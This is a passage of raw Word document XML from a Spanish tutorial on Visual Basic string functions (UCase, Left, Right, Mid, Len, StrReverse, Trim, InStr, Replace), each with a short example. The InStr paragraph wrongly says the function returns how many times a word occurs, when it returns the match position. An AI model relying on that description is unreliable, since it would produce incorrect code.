      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>UCase</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función convierte toda una cadena a mayúsculas. Si esta toda en mayúsculas la deja como está. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8629" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2950"/>
        <w:gridCol w:w="5679"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="633"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950"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UCase(</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67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la cadena Hola. Tras aplicarle la función </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>UCase</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> a Variable, Variable2 tiene “HOLA”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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tercera función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Left</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función coge un número de caracteres específicos desde la izquierda de una cadena y los guarda en una variable. Esta función, junto con Len y Right es de las más importantes y usadas en la programación (VB). Un ejemplo de uso de esta función es el siguiente, donde Variable es una variable que guarda una cadena y 6 el número de caracteres que quieres coger:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="17" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2764"/>
        <w:gridCol w:w="5937"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="909"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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 a todos"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4"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Left(</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Variable,6</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="593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la cadena Hola a todos. Tras aplicarle la función </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Left</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> a Variable especificando 6 caracteres, Variable2 obtiene la cadena Hola a.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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cuarta función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Right</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función coge un número de caracteres específicos desde la derecha de una cadena y los guarda en una variable. Un ejemplo de uso de esta función es el siguiente, donde Variable es una variable que guarda una cadena y 7 el número de caracteres que quieres coger:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="51" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2944"/>
        <w:gridCol w:w="5757"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="909"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="294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 a todos"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4"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Right(</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Variable,7</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="575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la cadena Hola a todos. Tras aplicarle la función </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Right </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> Variable especificando 7 caracteres, Variable2 obtiene la cadena a todos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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quinta función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Mid</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función coge un número de caracteres específicos desde un punto específico de una cadena y los guarda </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>en una variable. Un ejemplo de uso de esta función es el siguiente, donde Variable es una variable que guarda una cadena, 6 el carácter-1 desde el que empieza a contar y 3, el número de caracteres que quieres coger:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="13" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3304"/>
        <w:gridCol w:w="5397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1185"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330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 a todos"</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Mid(</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Variable,6,3</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="539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Hola a todos”. Tras aplicarle la función</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> Mid </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> Variable especificando 3 caracteres desde el carácter 5 (6-1=5), Variable2 obtiene la cadena “a t”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="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xta función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Len</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función lee el número de caracteres de una cadena y devuelve un número con su cantidad. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="2" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3304"/>
        <w:gridCol w:w="5397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="909"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330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Hola a todos" Variable2 = </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Len(</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39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Hola a todos. Tras aplicarle la función</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> Len </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> Variable, Variable2 obtiene el valor numérico 12.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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éptima función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>StrReverse</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función invierte la posición de los caracteres de una cadena, colocando la primera letra la ultima, la última la primera y así sucesivamente. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="74" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2764"/>
        <w:gridCol w:w="5937"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="909"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2764"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 a todos"</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trReverse(</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93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Hola a todos. Tras aplicarle la función</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StrReverse</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> a Variable, Variable2 obtiene la cadena “sodot a aloH”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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octava función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Trim</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función elimina los espacios que pueda haber al inicio y final de una cadena de caracteres. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8671" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="46" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3110"/>
        <w:gridCol w:w="5561"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="909"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3110"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 Hola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Trim(</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561"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 Hola ". Tras aplicarle la función</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Trim</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> a Variable, Variable2 obtiene la cadena "Hola".</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="42"/>
        <w:ind w:left="93" w:right="16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novena función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>InStr</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función busca </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>un una palabra</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, dentro de una cadena con alguna frase, y devuelve el numero de veces que la ha encontrado. Los modos de búsqueda son vbTextCompare (Texto: No respeta mayúsculas) y vbBinaryCompare (Binario: Respeta mayúsculas). Por ejemplo, un ejemplo de uso es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4204"/>
        <w:gridCol w:w="4497"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1185"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420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Variable = "Hola a todos"</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InStr(</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>1,Variable, "Hola", vbTextCompare)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449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Hola a todos. Tras aplicarle la función</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InStr</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> a Variable, Variable2 obtiene el valor 1, por el hola que hay.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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décima y última función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Replace</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función busca </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>un una palabra</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, dentro de una cadena con alguna frase, y la sustituye por otra que le indiquemos nosotros. Los modos de búsqueda son vbTextCompare (Texto: No respeta mayúsculas) y vbBinaryCompare (Binario: Respeta mayúsculas). Esta función también es muy usada, y también sirve para eliminar partes o palabras de un texto, reemplazando por una cadena de longitud 0 (“”). Por ejemplo, un ejemplo de uso es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="16" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3390"/>
        <w:gridCol w:w="5311"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="909"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3390"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 a todos"</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roofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
